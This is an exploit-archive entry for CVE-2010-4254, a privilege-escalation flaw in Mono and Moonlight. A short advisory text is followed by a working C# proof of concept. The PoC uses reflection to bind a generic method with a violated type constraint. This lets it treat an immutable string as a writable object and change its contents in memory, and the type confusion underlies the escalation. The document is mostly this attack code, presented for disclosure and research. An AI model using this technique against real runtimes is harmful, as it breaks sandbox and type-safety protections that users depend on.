Mono/Moonlight Generic Type Argument - Privilege Escalation

Author: Chris Howie
type: dos
platform: linux
port: 
date_added: 2011-03-02 
date_updated: 2011-03-02 
verified: 1 
codes: CVE-2010-4254 
tags: 
aliases:  
screenshot_url:  
application_url: 

Sources:  https://www.chrishowie.com/2010/11/24/mutable-strings-in-mono/
https://www.securityfocus.com/bid/45051/info

Mono and Moonlight is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer.

PoC:

using System;
using System.Reflection;

public class FakeString {
    public int length;
    public char start_char;
}

public class TestCase {
    private static FakeString UnsafeConversion<T>(T thing)
        where T : FakeString
    {
        return thing;
    }

    public static void Main() {
        var a = "foo";
        var b = MakeMutable(a);

        Console.WriteLine(a);
        b.start_char = 'b';
        Console.WriteLine(a);
    }

    private static FakeString MakeMutable(string s)
    {
        var m = typeof(TestCase).GetMethod("UnsafeConversion", BindingFlags.NonPublic | BindingFlags.Static);
        var m2 = m.MakeGenericMethod(typeof(string));

        var d = (Func<string, FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null, m2);

        return d(s);
    }
}